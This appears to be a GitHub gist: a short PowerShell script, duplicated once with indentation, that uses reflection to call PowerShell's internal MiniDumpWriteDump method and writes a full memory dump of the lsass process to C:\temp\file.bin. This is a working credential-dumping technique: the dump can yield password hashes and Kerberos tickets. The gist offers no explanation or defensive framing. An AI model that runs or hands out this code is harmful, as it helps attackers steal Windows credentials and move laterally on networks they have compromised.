cfalta/procdump.ps1

## procdump.ps1
$DumpFilePath = "C:\temp\file.bin"

$WER = [PSObject].Assembly.GetType("System.Management.Automation.WindowsErrorReporting")
$WERNativeMethods = $WER.GetNestedType("NativeMethods", "NonPublic")
$Flags = [Reflection.BindingFlags] "NonPublic, Static"
$MiniDumpWriteDump = $WERNativeMethods.GetMethod("MiniDumpWriteDump", $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
$Process = Get-Process lsass
$ProcessId = $Process.Id
$ProcessHandle = $Process.Handle
$FileStream = New-Object IO.FileStream($DumpFilePath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero))
$FileStream.Close()
	$DumpFilePath = "C:\temp\file.bin"

	$WER = [PSObject].Assembly.GetType("System.Management.Automation.WindowsErrorReporting")
	$WERNativeMethods = $WER.GetNestedType("NativeMethods", "NonPublic")
	$Flags = [Reflection.BindingFlags] "NonPublic, Static"
	$MiniDumpWriteDump = $WERNativeMethods.GetMethod("MiniDumpWriteDump", $Flags)
	$MiniDumpWithFullMemory = [UInt32] 2
	$Process = Get-Process lsass
	$ProcessId = $Process.Id
	$ProcessHandle = $Process.Handle
	$FileStream = New-Object IO.FileStream($DumpFilePath, [IO.FileMode]::Create)
	$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero))
	$FileStream.Close()